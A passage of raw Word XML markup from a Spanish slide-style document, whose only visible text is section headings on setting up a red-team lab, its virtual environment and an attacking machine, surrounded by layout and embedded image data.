                            <w:pPr>
                              <w:spacing w:before="1"/>
                              <w:ind w:left="1260"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>2. CONFIGURACI</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>Ó</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>N DEL LABORATORIO DEL EQUIPO ROJO</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4905912D" id="Textbox 321" o:spid="_x0000_s1160" type="#_x0000_t202" style="width:705.6pt;height:2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" fillcolor="#b34512" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="306F6343" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="56"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3C3FE059" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="1"/>
                        <w:ind w:left="1260"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>2. CONFIGURACI</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>Ó</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>N DEL LABORATORIO DEL EQUIPO ROJO</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5369CBA5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB65688" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="977" w:lineRule="exact"/>
        <w:ind w:left="1100"/>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82144" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7939BF19" wp14:editId="376526EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="6858000"/>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8000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="323" name="Graphic 323"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="324" name="Image 324"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId146" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1588008" y="1263373"/>
                            <a:ext cx="9002268" cy="5594626"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="325" name="Image 325"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId147" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1780032" y="1455418"/>
                            <a:ext cx="8631936" cy="5303518"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1978CDB2" id="Group 322" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:540pt;z-index:-17934336;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121920,68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fxB/487T/r&#10;of5V1lcn8Qf+PO0/66H+VZVfgZ2YP+PE4iiiivPPrAooooAKKKKACiiigAooooAKKKKACiiigAoo&#10;ooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii&#10;gAooooAKKKKAOk0j/kHRfj/M0UaR/wAg6L8f5miulbI8ifxs7+iiiuw+e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P4g/8AHnaf9dD/ACrrK5P4g/8AHnaf9dD/ACrKr8DOzB/x4nEUUUV559YFFFFA&#10;BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF&#10;FFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB0mkf8AIOi/H+Zoo0j/AJB0X4/zNFdK2R5E&#10;/jZ39FFFdh88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yfxB/wCPO0/66H+VdZXJ/EH/AI87T/ro&#10;f5VlV+BnZg/48TiKKKK88+sCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiig&#10;AooAJzx060UAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUA&#10;dJpH/IOi/H+Zoo0j/kHRfj/M0V0rZHkT+Nnf0UUV2Hz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T+IP8Ax52n&#10;/XQ/yrrK5P4g/wDHnaf9dD/KsqvwM7MH/HicRRRRXnn1gUUUUAFFFFABRRRQAUUUUAFFFFABRRRQ&#10;AUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAB&#10;RRRQAUUUUAFFFFAHSaR/yDovx/maKNI/5B0X4/zNFdK2R5E/jZ39FFFdh8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yfxB/487T/rof5V1lcn8Qf+PO0/66H+VZVfgZ2YP+PE4iiiivPPrAooooAKKK&#10;KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoooo&#10;AKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOk0j/kHRfj/M0UaR/yDovx/maK6VsjyJ/Gzv6K&#10;KK7D54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n8Qf8AjztP+uh/lXWVyfxB/wCPO0/66H+V&#10;ZVfgZ2YP+PE4iiiivPPrAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKK&#10;KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOk0j/AJB0&#10;X4/zNFGkf8g6L8f5miulbI8ifxs7+iiiuw+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P4g/wDH&#10;naf9dD/Kusrk/iD/AMedp/10P8qyq/Azswf8eJxFFFFeefWBRRRQAUUUUAFFFFABRRRQAUUUUAFF&#10;FFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU&#10;UAFFFFABRRRQAUUUUAdJpH/IOi/H+Zoo0j/kHRfj/M0V0rZHkT+Nnf0UUV2Hz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T+IP/AB52n/XQ&#10;/wAq6yuT+IP/AB52n/XQ/wAqyq/Azswf8eJxFFFFeefWBRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA&#10;BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF&#10;FFFABRRRQAUUUUAdJpH/ACDovx/maKNI/wCQdF+P8zRXStkeRP42d/RRRXYfP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n8Qf8AjztP+uh/lXWVyfxB/wCPO0/66H+VZVfgZ2YP+PE4iiiivPPrAooo&#10;oAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiig&#10;AooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOk0j/AJB0X4/zNFGkf8g6L8f5miulbI8i&#10;fxs7+iiiuw+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">
                <v:shape id="Graphic 323" o:spid="_x0000_s1027" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 324" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:15880;top:12633;width:90022;height:5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">
                  <v:imagedata r:id="rId148" o:title=""/>
                </v:shape>
                <v:shape id="Image 325" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:17800;top:14554;width:86319;height:5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">
                  <v:imagedata r:id="rId149" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2.1 Configuración y configuración del entorno virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A224DDD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3111E271" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1628C3A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E66C6E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DA897D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D92581" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8075F8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143A761A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D1701B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC6792C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B23841F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C906BE9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B888A89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603768C8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48BBB7A4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6480F980" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F0850F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202D56F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066DCBED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D34EB2F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322F4ABC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B52CDE9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B245A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C26E19F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAA7550" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5863751F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A911826" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B586D9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A719A43" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="159"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7337FD10"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78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F4516A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId150"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="520" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E41A10"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96736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E935440" wp14:editId="3513E248">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1325880"/>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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="329" name="Graphic 329"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="330" name="Textbox 330"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6F152472" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="3971"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>2.2 Configuraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n de la m</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>á</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>quina atacante</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
